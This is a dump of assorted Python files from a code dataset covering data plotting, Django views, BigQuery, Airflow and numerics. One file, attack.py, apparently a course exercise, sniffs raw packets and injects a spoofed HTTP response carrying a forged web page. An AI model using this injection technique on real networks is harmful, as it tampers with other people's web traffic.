open(\"all_dir/Merged_jsons/Merged_thresholds.json\", \"r\") as f:\n        Thresholds = json.load(f)\n    \n    tempn = len(Thresholds)\n    \n    for s in range(tempn):\n        \n        thresholds = Thresholds[str(s)]\n\n        Detection_Prob, New_False_Prob = ROC_Data(min(thresholds), max(thresholds), N, s)\n        plt.plot(New_False_Prob, Detection_Prob, label=stat_list[s])\n\n    plt.xlabel(\"New_False_Probs\")\n    plt.ylabel(\"Detection_Probs\")\n    plt.title(\"ROC Curve:N={}\".format(N))\n    plt.legend()\n    plt.savefig(\"all_dir/plots/{}.png\".format(outputfile))\n\nif __name__==\"__main__\":\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--N', type=int)\n    parser.add_argument('--outputfile', nargs='?', const=1, type=str, default=\"ROC_test\")\n    args = parser.parse_args()\n\n    ROC_Curve(args.N, args.outputfile)\n","sub_path":"Statistic_Analysis/ROC_Curve.py","file_name":"ROC_Curve.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"292935650","text":"\"\"\"\r\nThe view layer of the API: handles string formatting and responses\r\n\"\"\"\r\n\r\nimport datetime\r\nimport logging\r\nimport time\r\nimport os\r\nfrom django.http import HttpResponse, JsonResponse\r\nfrom .utils import LookupNotFoundError, InvalidDateError\r\nfrom .parse import parse_merchandise, parse_retail\r\nfrom .crocs import cross_origin\r\nfrom .models import Merchandise, Retail\r\n\r\n# get the current date\r\ncurrent_date = time.strftime(\"%Y-%m-%d\")\r\ncurrent_log_file = \"{}.log\".format(current_date)\r\n\r\n# header to add to the start of log file\r\nlog_header = \"Australian Statistics API\\nLog file for date: {}\\nDeveloper Team: Eleven51\\n\\n\".format(current_date)\r\n\r\n# add header if current date's log file does not exist or is empty\r\nif not os.path.isfile(current_log_file) or os.stat(current_log_file).st_size==0:\r\n    file = open(current_log_file, 'w+')\r\n    file.write(log_header)\r\n    file.close()\r\n\r\n# configure logging formatting\r\nlogging.basicConfig(filename=\"{}.log\".format(current_date), level=logging.DEBUG, format=\"%(asctime)s: %(levelname)s: %(message)s\")\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\n@cross_origin\r\ndef index(request):\r\n    \"\"\"\r\n    # Index route, only echo the request\r\n    :param request: http 
request\r\n :return: http response\r\n \"\"\"\r\n return HttpResponse('This is the API end point v3. Request is:' + str(request))\r\n\r\n\r\n@cross_origin\r\ndef show_merchandise_data(request, categories, states=\"Total\"):\r\n \"\"\"\r\n get the request, return merchandise data\r\n :param request: contain date\r\n :param categories: Categories string\r\n :param states: str, List of states\r\n :return: JSON of merch data\r\n \"\"\"\r\n\r\n # begin timer and log request\r\n start_time = time.time()\r\n logger.info(\"New API request: {}\".format(request.get_full_path()))\r\n\r\n start_date = request.GET.get('startDate')\r\n end_date = request.GET.get('endDate')\r\n\r\n # string to list\r\n categories_list = categories.split(',')\r\n states_list = states.split(',')\r\n\r\n try:\r\n merch = Merchandise(categories_list, states_list, start_date, end_date)\r\n except (LookupNotFoundError, InvalidDateError) as error:\r\n logger.info(\"HTTP 404 ERROR: Request '{}': {}\".format(request.get_full_path(), str(error)))\r\n return JsonResponse(error.to_json(), status=404)\r\n\r\n merch_json = merch.get_json()\r\n if merch.response_status == 'error':\r\n return JsonResponse(merch_json, status=404)\r\n\r\n # end timer and log successful response\r\n end_time = time.time()\r\n ms_elapsed = (end_time - start_time)*1000\r\n\r\n result = parse_merchandise(merch_json,request, start_date, end_date, ms_elapsed)\r\n logger.info(\"HTTP 200 OK: Request '{}' successfully returned. Time taken: {}ms\".format(request.get_full_path(), ms_elapsed))\r\n\r\n return JsonResponse(result)\r\n\r\n\r\n@cross_origin\r\ndef show_retail_data(request, categories, states='AUS'):\r\n \"\"\"\r\n get the request, return retail data\r\n :param request: contain date\r\n :param categories: Categories string\r\n :param states: str, List of states\r\n :return: JSON of retail data\r\n \"\"\"\r\n\r\n # begin timer and log request\r\n start_time = time.time()\r\n logger.info(\"New API request: {}\".format(request.get_full_path()))\r\n\r\n start_date = request.GET.get('startDate')\r\n end_date = request.GET.get('endDate')\r\n\r\n # string to list\r\n categories_list = categories.split(',')\r\n states_list = states.split(',')\r\n\r\n # init a Retail Object\r\n # get the JSON file with the get_data method or something like that\r\n try:\r\n retail = Retail(categories_list, states_list, start_date, end_date)\r\n except (LookupNotFoundError, InvalidDateError) as error:\r\n logger.info(\"HTTP 404 ERROR: Request '{}': {}\".format(request.get_full_path(), str(error)))\r\n return JsonResponse(error.to_json(), status=404)\r\n\r\n retail_json = retail.get_json()\r\n if retail.response_status == 'error':\r\n return JsonResponse(retail_json, status=404)\r\n\r\n\r\n # end timer and log successful response\r\n end_time = time.time()\r\n ms_elapsed = (end_time - start_time)*1000\r\n\r\n result = parse_retail(retail_json,request, start_date, end_date, ms_elapsed)\r\n\r\n logger.info(\"HTTP 200 OK: Request '{}' successfully returned. 
Time taken: {}ms\".format(request.get_full_path(), ms_elapsed))\r\n\r\n    return JsonResponse(result)\r\n","sub_path":"apiv3/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"511065731","text":"import json\nfrom google.cloud import bigquery\nfrom google.oauth2 import service_account\nfrom google.cloud import bigquery_storage\nfrom utils.helperutils import HelperUtils\n\nclass BiqQueryHelper:\n    def __init__(self, table_id = None, job_config = None):  # was misspelled __inti__, so it never ran\n        utils = HelperUtils()\n        bigquery_config = utils.get_bigquery_config()\n        bigquery_key = utils.get_bigquery_key()\n\n        if bigquery_key != None:\n            bigquery_credentials = json.loads(bigquery_key)\n            self.credentials = service_account.Credentials.from_service_account_info(\n                bigquery_credentials)\n            self.client = bigquery.Client(\n                credentials=self.credentials, project=bigquery_config['project_id'])\n            self.storage_client = bigquery_storage.BigQueryReadClient(\n                credentials=self.credentials)\n        else:\n            raise Exception('Environment variable `BIGQUERY_KEY` is not set.')\n\n        self.table_id = table_id\n        self.job_config = job_config\n        self.job = None  # set by load_table(); checked by get_table()\n\n    def load_table(self, dataframe):\n        self.job = self.client.load_table_from_dataframe(\n            dataframe, self.table_id, job_config=self.job_config)\n        self.job.result()\n    \n    def get_table(self):\n        if (self.job != None and self.job.done()):\n            return self.client.get_table(self.table_id)\n        else:\n            return None\n\n    def get_dataframe_from_query(self, query):\n        return self.client.query(query).result().to_dataframe(self.storage_client)\n\n    def close_bigquery_client(self):\n        self.client.close()","sub_path":"src/bigquery_helper.py","file_name":"bigquery_helper.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"540861841","text":"# -*- coding: utf-8 -*-\nimport subprocess\nfrom airflow import DAG\nfrom airflow.exceptions import AirflowException # signal ERROR\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.sensors import BaseSensorOperator\nfrom datetime import datetime, timedelta\n\nclass ReportsRawReadySensor(BaseSensorOperator):\n    def poke(self, context):\n        retcode = subprocess.call(['sudo', '--non-interactive', '/usr/local/bin/docker-trampoline', 'reports_raw_sensor',\n            context['ds'], context['execution_date'].isoformat(), (context['execution_date'] + context['dag'].schedule_interval).isoformat()])\n        if retcode == 42:\n            return True\n        elif retcode == 13:\n            return False\n        else:\n            raise AirflowException('Unexpected `is-reports-raw-ready` exit code: {:d}'.format(retcode))\n\ndag = DAG(\n    dag_id='hist_canning',\n    schedule_interval=timedelta(days=1),\n    start_date=datetime(2012, 12, 5),\n    #end_date=datetime(2017, 7, 7), # NB: end_date is included\n    default_args={\n        'email': 'leonid@openobservatory.org', # prometheus/alertmanager sends to team@ but airflow is more chatty\n        'retries': 1,\n    })\n\n# NB: removing an Operator from DAG leaves some trash in the database tracking\n# old state of that operator, but it seems to trigger no issues with 1.8.0\n\nReportsRawReadySensor(task_id='reports_raw_sensor', poke_interval=5*60, timeout=12*3600, dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='canning', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='tar_reports_raw', bash_command='shovel_jump.sh', 
dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='reports_tgz_s3_sync', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='reports_tgz_s3_ls', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='reports_tgz_cleanup', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='canned_s3_sync', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='canned_s3_ls', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='canned_cleanup', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='autoclaving', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='meta_pg', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='reports_raw_cleanup', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='sanitised_s3_ls', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='sanitised_check', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='sanitised_cleanup', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='autoclaved_tarlz4_s3_sync', bash_command='shovel_jump.sh', dag=dag)\nBashOperator(pool='datacollector_disk_io', task_id='autoclaved_jsonl_s3_sync', bash_command='shovel_jump.sh', dag=dag)\n\ndag.set_dependency('reports_raw_sensor', 'canning')\n\ndag.set_dependency('reports_raw_sensor', 'tar_reports_raw')\ndag.set_dependency('canning', 'tar_reports_raw')\n\ndag.set_dependency('tar_reports_raw', 'reports_tgz_s3_sync')\n\ndag.set_dependency('reports_tgz_s3_sync', 'reports_tgz_s3_ls')\n\n# reports_raw_cleanup -> reports_tgz_cleanup is NOT a dependency as reports_raw_cleanup uses only index file\ndag.set_dependency('reports_tgz_s3_sync', 'reports_tgz_cleanup') # can't cleanup unless synced\ndag.set_dependency('reports_tgz_s3_ls', 'reports_tgz_cleanup') # data dependency\n\ndag.set_dependency('canning', 'canned_s3_sync')\n\ndag.set_dependency('canned_s3_sync', 'canned_s3_ls')\n\n# reports_raw_cleanup -> canned_cleanup is NOT a dependency as reports_raw_cleanup uses only index file\ndag.set_dependency('autoclaving', 'canned_cleanup') # uses `canned` data\ndag.set_dependency('tar_reports_raw', 'canned_cleanup') # may use `canned` data\ndag.set_dependency('canned_s3_sync', 'canned_cleanup') # can't cleanup unless synced\ndag.set_dependency('canned_s3_ls', 'canned_cleanup') # data dependency\n\ndag.set_dependency('canning', 'autoclaving')\n\ndag.set_dependency('autoclaving', 'meta_pg')\n\n# reports_raw_cleanup is done when both tasks are finished and have same data\n# reports_raw_cleanup does not remove unknown files as a safeguard\ndag.set_dependency('canning', 'reports_raw_cleanup')\ndag.set_dependency('tar_reports_raw', 'reports_raw_cleanup')\n\ndag.set_dependency('autoclaving', 'sanitised_check')\n\ndag.set_dependency('autoclaving', 'autoclaved_tarlz4_s3_sync')\n\ndag.set_dependency('autoclaving', 'autoclaved_jsonl_s3_sync')\n\ndag.set_dependency('autoclaving', 'sanitised_cleanup')\ndag.set_dependency('sanitised_s3_ls', 'sanitised_cleanup')\ndag.set_dependency('sanitised_check', 
'sanitised_cleanup')\n","sub_path":"ansible/roles/airflow/files/airflow-dags/canning.py","file_name":"canning.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"23235774","text":"#--------------------------------\r\n#EXERCISE 2\r\n#LEONIDAS PASTRAS\r\n#P20155\r\n#18-2-2021\r\n#--------------------------------\r\nimport random\r\n\r\nn = int(input(\"Enter a number (the index of the Fibonacci term to test): \"))\r\ni = 1\r\nnum = [0, 1]\r\np = num[1]\r\ndef Fibonacci(i, p):\r\n    if i < n:\r\n        i = i + 1\r\n        tempNum = num[1]\r\n        num[1] = num[1] + num[0]\r\n        num[0] = tempNum\r\n        Fibonacci(i, p)\r\n    else:\r\n        CheckIfPrime(num[1])\r\ndef CheckIfPrime(p):\r\n    isPrime = True\r\n    j = 0\r\n    while isPrime and j < 20:\r\n        a = random.randint(2, 1000000) #random base between 2 and 1 million (bases 0 and 1 are uninformative)\r\n        # Fermat test: pow(a, p, p) does modular exponentiation, so the huge\r\n        # intermediate value of a ** p is never materialised\r\n        isPrime = pow(a, p, p) == (a % p)\r\n        UnnecessaryMessage(a, isPrime)\r\n        j = j + 1\r\n    if isPrime:\r\n        print(\"The term\", n, \"of the Fibonacci sequence is\", p, \"and it is a Prime number! :D\")\r\n    else:\r\n        print(\"The term\", n, \"of the Fibonacci sequence is\", p, \"and it is NOT a Prime number! :(\")\r\ndef UnnecessaryMessage(a, isPrime):\r\n    if isPrime:\r\n        print(\"The random number\", a, \"does satisfy the equation\")\r\n    else:\r\n        print(\"The random number\", a, \"does NOT satisfy the equation\")\r\nFibonacci(i, p)","sub_path":"Code/Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"379557029","text":"from datetime import datetime\r\nimport optuna\r\nfrom joblib import dump, load\r\nfrom sklearn.metrics import mean_absolute_error, median_absolute_error, r2_score\r\nfrom SantaClaraPack.Models.PreProcessors import *\r\nfrom SantaClaraPack.Banco.Dados import Dados\r\nfrom SantaClaraPack.Optimizer.Optimizer import Optimizer\r\nfrom SantaClaraPack.Plot.Plot import Plot\r\n\r\nif __name__ == '__main__':\r\n    desired_width = 320\r\n    pd.set_option('display.width', desired_width)\r\n    pd.set_option('display.max_columns', 100)\r\n\r\n    # Evaluation of the hyper-tuned model\r\n    dao = Dados()\r\n    optimize = Optimizer()\r\n    pre = PreProcessors()\r\n    gridded = GriddedDataProcessor()\r\n    window = WindowProcessor()\r\n\r\n    study = optuna.create_study(\r\n        storage='sqlite:///Optimizer/optimize_tests.db',\r\n        direction='maximize',\r\n        study_name='optimize',\r\n        load_if_exists=True\r\n    )\r\n\r\n    # Load the model\r\n    model = load(filename=r'Models/mlp_posto_1.joblib')\r\n\r\n    df_resultados = pd.DataFrame()\r\n    df_vaz_true = dao.get_vazao(\r\n        data_inicial='2013-01-01',\r\n        data_final='2017-12-30'\r\n    )\r\n\r\n    df_vaz_true.drop(columns=['id', 'num_posto'], inplace=True)\r\n    df_vaz_true['dat_medicao'] = pd.to_datetime(df_vaz_true['dat_medicao'])\r\n    df_vaz_true.set_index(keys=['dat_medicao'], inplace=True)\r\n\r\n    df_chuva_true = dao.get_gridded_data(\r\n        classe='Chuva',\r\n        data_inicial='2013-01-01',\r\n        data_final='2017-12-30',\r\n        lat_inicial=-22.4,\r\n        lat_final=-21.2,\r\n        lon_inicial=-44.6,\r\n        lon_final=-44.2,\r\n    )\r\n\r\n    df_chuva_true['dat_medicao'] = pd.to_datetime(df_chuva_true['dat_medicao'])\r\n    df_chuva_true = gridded.transform(\r\n        df=df_chuva_true,\r\n        index='dat_medicao',\r\n        cols=['val_lat', 'val_lon'],\r\n        value='val_precip',\r\n        var_name='chuva',\r\n        agg='sum',\r\n    )\r\n\r\n    #for data in pd.date_range(start='2013-08-17', end='2017-12-30', freq='7D'):\r\n    for data in pd.date_range(start='2013-08-17', end='2017-12-01', freq='7D'):\r\n\r\n        data_inicial = datetime.strftime(\r\n            data + pd.to_timedelta(arg=study.best_params['window_neg'], unit='D'),\r\n            '%Y-%m-%d'\r\n        )\r\n\r\n        # note: the two offsets below cancel out, so data_final_vazao == data\r\n        data_final_vazao = data + pd.to_timedelta(arg=study.best_params['window_neg'], unit='D') + \\\r\n            pd.to_timedelta(arg=-study.best_params['window_neg'], unit='D')\r\n\r\n        data_final = datetime.strftime(\r\n            data + pd.to_timedelta(arg=10, unit='D'),\r\n            '%Y-%m-%d'\r\n        )\r\n\r\n        df_vazao = df_vaz_true.loc[data_inicial:data_final_vazao]\r\n\r\n        df_chuva_transform = df_chuva_true.loc[data_inicial:data_final]\r\n\r\n        # Build X and y\r\n        X = pd.concat(objs=[df_vazao[['val_vaz_natr']], df_chuva_transform], sort=True, axis=1)\r\n\r\n        i = 1\r\n        # Generate forecasts for t+1 through t+10 for each date of the outer loop\r\n        for data_previsao in pd.date_range(start=data, freq='1D', periods=10):\r\n\r\n            X_test_lag = window.transform_predict(\r\n                X=X,\r\n                n_in=study.best_params['window_neg'],\r\n                n_out=0\r\n            )\r\n\r\n            X_test_lag = pd.DataFrame(data=[X_test_lag.loc[data_previsao]], columns=X_test_lag.loc[data_previsao].index)\r\n            y_hat = model.predict(X=X_test_lag)\r\n\r\n            # Feed the prediction back into the working data\r\n            X.loc[data_previsao, 'val_vaz_natr'] = y_hat\r\n\r\n            # Append to the results log\r\n            aux = pd.DataFrame(\r\n                data=dict(\r\n                    dat_reference=data,\r\n                    dat_previsao=data_previsao,\r\n                    num_termo=i,\r\n                    val_vaz_pred=y_hat,\r\n                    val_vaz_true=df_vaz_true.loc[data_previsao, 'val_vaz_natr']\r\n                )\r\n            )\r\n\r\n            df_resultados = pd.concat(objs=[df_resultados, aux], ignore_index=True)\r\n            i += 1\r\n\r\n    # Scores\r\n    #print('MAE test: {:}'.format(mean_absolute_error(y_true=, y_pred=X_test_lag[1:, 'val_vaz_natr'])))\r\n    #print('MedAE test: {:}'.format(median_absolute_error(y_true=y_test_lag, y_pred=y_hat)))\r\n    #print('R2 test: {:}'.format(r2_score(y_true=y_test_lag, y_pred=y_hat)))\r\n\r\n    df_resultados.to_csv(path_or_buf=r'Fig/resultados_posto_1.csv', sep=';', decimal=',')\r\n\r\n    # plot\r\n    #plot = Plot()\r\n    #plot.plot_prediction_compararison(y_true=y_test_lag['val_vaz_natr'].values, y_pred=y_hat, times=y_test_lag.index)","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"294029695","text":"# coding=utf-8\n# 3. 
AFED = Accessibility of flow taking existing destinations\n\nimport numpy as np\nimport pandas as pd\n\n\ndef AFED(flow_df, row_index): # AFAPF\n\n    # rename the columns so we can call them\n    flow_df = flow_df.rename(columns = {flow_df.columns[0]:'origin_ID', \n                                        flow_df.columns[1]:'dest_ID', \n                                        flow_df.columns[2]:'dist', \n                                        flow_df.columns[3]:'weight', \n                                        flow_df.columns[4]:'dest_mass'})\n    # define O and D for this row\n    D = flow_df['dest_ID'][row_index]\n    O = flow_df['origin_ID'][row_index]\n\n    # get the list of possible destinations\n    all_dest = (flow_df.query('origin_ID == @O')\n                .query('weight > 0')\n                ['dest_ID']\n                .unique()\n                )\n\n    # Create all destination flows and merge in the distances and masses\n    x1 = pd.DataFrame({'D': np.array([D]*len(all_dest), dtype=object), \n                       'dests':all_dest}).merge(flow_df, how='left', left_on=['D','dests'], right_on=['origin_ID','dest_ID'])\n\n    # Delete the flow back to the origin ([O], not list(O): list() would split a string ID into characters)\n    x1 = x1[~x1.dests.isin([O])]\n\n    # calculate the accessibility\n    A = (x1['dist']*x1['dest_mass']).sum()\n\n    return A\n","sub_path":".ipynb_checkpoints/AFED-checkpoint.py","file_name":"AFED-checkpoint.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"649671906","text":"#!/usr/bin/python\n\n# Scrape http://auctions.strettons.co.uk and store the results\n# in a CSV file\n#\n# Syntax: scrape_auctions.py <output file>\n# If the first argument is '-', then the output is printed on the screen\n\nimport re\nimport bs4\nimport csv\nimport sys\nimport urllib2\n\n# most of the documents are generated dynamically through document.write()\n# this function extracts the strings out of document.write(), unescapes double quotes\n# and converts non-breaking spaces to normal spaces\ndef decode_document_writes(content):\n    content = re.sub('^document.write\\(\"(.*)\"\\);', '\\\\1', content, 0, re.MULTILINE)\n    content = re.sub('\\\\', '', content, 0, re.MULTILINE)\n    # replace non-breaking spaces with normal spaces\n    content = re.sub(u'\u00a0', ' ', content, 0, re.MULTILINE)\n\n    return content\n\n# get the stripped string from a HTML element\ndef get_stripped_string(element):\n    string = ''.join([ text for text in element.stripped_strings ])\n\n    return string.encode('utf8')\n\n\n\ncsv_file = 'strettons.csv'\ncsv_file = open(csv_file, \"w\")\n\nbase_url = \"http://auctions.strettons.co.uk/CurrentAuction.aspx\"\n\nhomepage = urllib2.urlopen(base_url)\nsoup = bs4.BeautifulSoup(homepage)\n\n# there are multiple scripts that render the auction pages\n# first, main_script is loaded, which in turn loads auction_script\nmain_script_element = soup.find('script')\nmain_script_url = main_script_element.get('src')\nmain_script = urllib2.urlopen(main_script_url)\nmain_script_content = main_script.read().decode('utf8')\n\n# auction_script generates the actual list of auctions on the home page\nauction_script_url_matches = re.search(\"http.*auction/[0-9]+/\", main_script_content)\nauction_script_url = auction_script_url_matches.group()\nauction_script = urllib2.urlopen(auction_script_url)\nauction_script_content = auction_script.read().decode('utf8')\nauction_script_content = decode_document_writes(auction_script_content)\n\n# details_script contains all the details of an auction\ndetails_script_url_matches = re.search(\"http.*/lot/\", main_script_content)\ndetails_script_url = details_script_url_matches.group()\n\nsoup = bs4.BeautifulSoup(auction_script_content)\n\n# all the auction information. 
it is not really required,\n# but can be helpful if the script needs to be extended\nauctions = []\nfor tr in soup.find_all('tr'):\n tds = tr.find_all('td')\n if (len(tds) != 3):\n continue\n\n lot_td, link_td, _ = tds\n\n # lot num is easier to get here\n lot_num = get_stripped_string(lot_td)\n\n # link to the particular auction page\n link_a = link_td.find('a')\n link = link_a.get('href')\n\n # extra parameters that may be pased\n lid = re.sub('.*lid=([0-9]+).*', '\\\\1', link)\n tid = re.sub('.*tid=([^&]*).*', '\\\\1', link)\n\n # logic copied from the javascript\n if tid == link:\n tid = '9'\n\n # last part of the URL\n urlpart = lid + \"/\" + tid\n\n auction = {\n 'lot_num': lot_num,\n 'url': details_script_url + urlpart + '?src=null'\n }\n\n auctions += [ auction ]\n\nwriter = csv.writer(csv_file)\n\n# load the auction page, get the timings and print the result\nfor auction in auctions:\n url = auction['url']\n auction_page = urllib2.urlopen(url)\n auction_content = auction_page.read().decode('utf8')\n auction_content = decode_document_writes(auction_content)\n\n soup = bs4.BeautifulSoup(auction_content)\n lot_address_div = soup.find(class_ = 'lotaddress')\n lot_address = get_stripped_string(lot_address_div)\n\n timing_ps = soup.find_all(class_ = 'red')\n\n timings = []\n for timing_p in timing_ps:\n timings += [ get_stripped_string(timing_p) ]\n\n auction['address'] = lot_address\n auction['timings'] = timings\n\n writer.writerow([ auction['lot_num'], auction['address'] ] + auction['timings'])\n csv_file.flush()\n\n","sub_path":"ScrapeScripts/strettons.py","file_name":"strettons.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"383224736","text":"# Copyright 2015 Cisco Systems, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom nose.tools import *\nfrom ucsmsdk.ucsfilter import generate_infilter\nfrom ucsmsdk.ucsxmlcodec import to_xml_str\n\n\ndef test_001_not_filter():\n\n expected = b''\n\n filter_str = 'not (dn,\"org-root/ls-C1_B1\", type=\"eq\")'\n filter_xml = generate_infilter(class_id=\"LsServer\",\n filter_str=filter_str,\n is_meta_class_id=True)\n\n xml_str = to_xml_str(filter_xml.to_xml())\n\n assert_equal(xml_str, expected)\n","sub_path":"tests/common/test_generate_filter.py","file_name":"test_generate_filter.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"294029695","text":"from flask import jsonify\n\nclass SecurityManager__Utils(object):\n\n def _prepare_create_user_args(self, **kwargs):\n \"\"\"Checking if specified roles exist\"\"\"\n roles = kwargs.get(\"roles\", [])\n for i, role in enumerate(roles):\n rn = role.name if isinstance(role, self.role_model) else role\n roles[i] = self.find_role(rn)\n kwargs[\"roles\"] = roles\n return kwargs\n\n def _json_response(self, status, redirect_addr, desc):\n resp = {}\n resp['status'] = status\n resp['redirect_addr'] = 
redirect_addr\n resp['desc'] = desc\n return jsonify(resp)\n","sub_path":"flask_security/security_manager__utils.py","file_name":"security_manager__utils.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"484307196","text":"\n\n#calss header\nclass _CIRCUMNAVIGATE():\n\tdef __init__(self,): \n\t\tself.name = \"CIRCUMNAVIGATE\"\n\t\tself.definitions = [u'to sail all the way around something: ', u'to move around something in order to avoid hitting it: ', u'to avoid something by taking a particular course of action: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_circumnavigate.py","file_name":"_circumnavigate.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"76418375","text":"#!/usr/bin/python3\n\nimport scapy\nfrom scapy.all import send, conf, L3RawSocket\n\ndef inject_pkt(pkt):\n #import dnet\n #dnet.ip().send(pkt)\n conf.L3socket=L3RawSocket\n send(pkt)\n\n######\n# edit this function to do your attack\n######\ndef handle_pkt(pkt):\n identifyServer = str(pkt[30])+\".\"+str(pkt[31])+\".\"+str(pkt[32])+\".\"+str(pkt[33])\n if identifyServer == \"18.234.115.5\" and pkt.find(b'GET')!=-1: \n numberSeq = int(pkt[38:42].hex(),16)\n numberAck = int(pkt[42:46].hex(),16)\n portDestination = int(pkt[34:36].hex(),16)\n final_IP = str(pkt[26])+\".\"+str(pkt[27])+\".\"+str(pkt[28])+\".\"+str(pkt[29])\n payloadFinal = 'HTTP/1.1 200 OK\\r\\nServer: nginx/1.14.0 (Ubuntu)\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nContent-Length: 335\\r\\nConnection: close\\r\\n\\r\\n\\n\\n Free AES Key Generator!\\n\\n\\n

Free AES Key Generator!

\\nDefinitely not run by the NSA.
\\n
\\n
\\nYour free AES-256 key: 4d6167696320576f7264733a2053717565616d697368204f7373696672616765
\\n\\n'\n packet = IP(src=\"18.234.115.5\", dst=final_IP)/TCP(sport=80, dport=portDestination, flags=\"PA\", seq = numberAck , ack=numberSeq+1)/payloadFinal\n inject_pkt(packet)\n\ndef main():\n import socket\n s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, 0x0300)\n while True:\n pkt = s.recv(0xffff)\n handle_pkt(pkt)\n\nif __name__ == '__main__':\n main()\n","sub_path":"attack.py","file_name":"attack.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"417834292","text":"from operator import itemgetter\nimport csv\nreader = csv.reader(open(\"part_00000\"), delimiter=\"\\t\")\n\nf = open(\"sorted_data.tsv\", \"w\")\nf.write('%s\\t%s\\n'%(\"text\", \"size\"))\nfor line in sorted(reader, key=lambda row: int(row[1]), reverse=True):\n f.write( '%s\\t%s\\n' %(line[0],line[1]) ) # str() converts to string\nf.close()\n #print '%s\\t%s' %(line[0],line[1])\n","sub_path":"tsv_sort.py","file_name":"tsv_sort.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"453997992","text":"\n\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot\nimport argparse\nimport logging\nfrom mdtools import dr, get_object\nimport scipy.integrate\n\nfrom scipy.optimize import minimize\nimport pymbar\nimport time\n\nfrom mdtools import ParallelTool\n\nfrom constants import k\n\nfrom whamutils import *\n\nimport matplotlib as mpl\n\nimport matplotlib.pyplot as plt\n\n\nlog = logging.getLogger('mdtools.whamerr')\n\nfrom IPython import embed\n\n\ndef _subsample_small(bias_mat, uncorr_n_samples, uncorr_n_tot, n_samples, n_windows):\n\n # sub sample the bias matrix according to the number of uncorrelated samples from each window\n uncorr_bias_mat = np.zeros((uncorr_n_tot, n_windows), dtype=np.float32)\n start_idx = 0\n uncorr_start_idx = 0\n subsampled_indices = np.array([], dtype=int)\n\n np.random.seed()\n\n for i, this_uncorr_n_sample in enumerate(uncorr_n_samples):\n # the total number of (correlated) datapoints for this window\n this_n_sample = n_samples[i]\n avail_indices = np.arange(this_n_sample)\n # subsampled indices for this data\n this_indices = start_idx + np.random.choice(avail_indices, size=this_uncorr_n_sample, replace=True)\n subsampled_indices = np.append(subsampled_indices, this_indices)\n\n uncorr_bias_mat[uncorr_start_idx:uncorr_start_idx+this_uncorr_n_sample, :] = bias_mat[this_indices, :]\n \n uncorr_start_idx += this_uncorr_n_sample\n start_idx += this_n_sample\n\n\n return (uncorr_bias_mat, subsampled_indices)\n\ndef _subsample(bias_mat, uncorr_n_samples, autocorr_blocks, 